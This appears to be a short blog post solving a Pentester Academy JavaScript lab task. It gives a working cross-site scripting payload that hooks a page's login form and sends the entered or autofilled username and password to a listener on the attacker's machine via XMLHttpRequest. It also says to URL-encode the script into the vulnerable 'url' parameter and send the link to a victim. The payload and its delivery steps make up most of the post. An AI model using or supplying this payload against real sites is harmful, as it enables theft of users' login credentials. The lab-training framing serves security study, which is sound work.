Hello Pentesters, today I am going to post another solution to the task provided at Javascript for Pentester at Pentester Academy. This task is same as of task 12, you will learn how to grab the auto-fills of the website if it is vulnerable to XSS. Modern web browsers do not seem to autofill the username & passwords, you may have to try some old browser for this task. You can view solutions to the other tasks here.

Task 13: Posting with XMLHttpRequest | Task Link

Provided that “url” parameter of the URL is vulnerable to XSS injection, we can verify it by using some injections on it. This task is same as of task 12 but in this task, we have to do the same task with XML request.

<script>
var formcon = document.forms[0];
formcon.onsubmit = submit;
function submit()
{
var un = formcon.elements[0].value;
var up = formcon.elements[1].value; 
 var req = new XMLHttpRequest();
req.open('GET','http://localhost:8000/f?'+'username='+un+'&password='+up,true);
req.send();
return false;
}
 </script>

For this, we have to first set up our simple HTTP server in python to grab the request made by XMLHttpRequest method. Copy and URL-encode the code and paste it after the ’url’ parameter on the same page and send it to your victim. When our victim opens the link then the username and password filled by autofill will be sent to attacker machine with XML request.
That’s all. Refer this post as a quick solution for the Javascript for Pentester tasks. For an in-depth video tutorial, please refer to the video solutions provided at Pentester Academy website.